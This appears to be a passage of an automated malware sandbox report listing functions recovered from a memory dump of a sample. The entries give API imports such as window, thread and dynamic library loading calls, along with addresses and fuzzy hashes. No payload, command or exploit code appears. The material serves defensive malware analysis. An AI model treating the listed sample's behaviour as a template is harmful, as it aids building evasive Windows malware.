                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$CountItemStringWindow_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 1823500076-0
                                                                                          • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                          • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                          • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                          • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                          Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Enable$Show$MessageMoveSend
                                                                                          • String ID:
                                                                                          • API String ID: 896007046-0
                                                                                          • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                          • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                          • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                          • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                          Function 004413F0 Relevance: 10.6, APIs: 7, Instructions: 114windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                          • SendMessageW.USER32(02FE1B10,000000F1,00000000,00000000), ref: 004414C6
                                                                                          • SendMessageW.USER32(02FE1B10,000000F1,00000001,00000000), ref: 004414F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 312131281-0
                                                                                          • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                          • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                          • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                          • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                          Function 0044849C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 004484C4
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                          • IsMenu.USER32(?), ref: 0044857B
                                                                                          • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                          • DrawMenuBar.USER32 ref: 004485E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 3866635326-4108050209
                                                                                          • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                          • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                          • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                          • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                          Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                          • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                          • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                          • String ID: 0vH
                                                                                          • API String ID: 327565842-3662162768
                                                                                          • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                          • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                          • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                          • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                          Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                          • GetFocus.USER32 ref: 00448B1C
                                                                                          • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                          • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                          • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                          • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Enable$Show$FocusMessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3429747543-0
                                                                                          • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                          • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                          • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                          • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                          Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                          • __swprintf.LIBCMT ref: 0045D3CC
                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                          • String ID: %lu$HH
                                                                                          • API String ID: 3164766367-3924996404
                                                                                          • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                          • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                          • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                          • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                          Function 00450DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: Msctls_Progress32
                                                                                          • API String ID: 3850602802-3636473452
                                                                                          • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                          • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                          • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                          • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                          Function 00455449 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00455451
                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 0045545F
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                          • String ID:
                                                                                          • API String ID: 3985565216-0
                                                                                          • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                          • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                                          • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                                          • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                                          Function 00415702 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                          • __calloc_crt.LIBCMT ref: 00415743
                                                                                          • __getptd.LIBCMT ref: 00415750
                                                                                          • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                          • __dosmaperr.LIBCMT ref: 004157A9
                                                                                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 1269668773-0
                                                                                          • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                          • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                          • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                          • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                          Function 00439102 Relevance: 10.5, APIs: 7, Instructions: 46threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                            • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                          • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 1957940570-0
                                                                                          • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                          • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                          • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                          • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                          Function 0041568B Relevance: 10.5, APIs: 7, Instructions: 37threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                            • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                            • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                            • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                          • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                            • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                          • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                            • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                          • ExitThread.KERNEL32 ref: 004156BD
                                                                                          • __freefls@4.LIBCMT ref: 004156D9
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                          • String ID:
                                                                                          • API String ID: 4166825349-0
                                                                                          • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                          • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                          • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                          • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                          Function 00434124 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 15libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                          • API String ID: 2574300362-3261711971
                                                                                          • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                          • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                          • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                          • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                          Function 0047B1D0 Relevance: 9.5, APIs: 6, Instructions: 489COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
                                                                                          • Instruction ID: be39947db1ffbcb7075193c31d102fc15fe4f6af8d23ce90efbce3d2b6a77a88
                                                                                          • Opcode Fuzzy Hash: c82efa3070467c2623ec738b5b2be2cd760763614a3dd1863134219050ad48d5
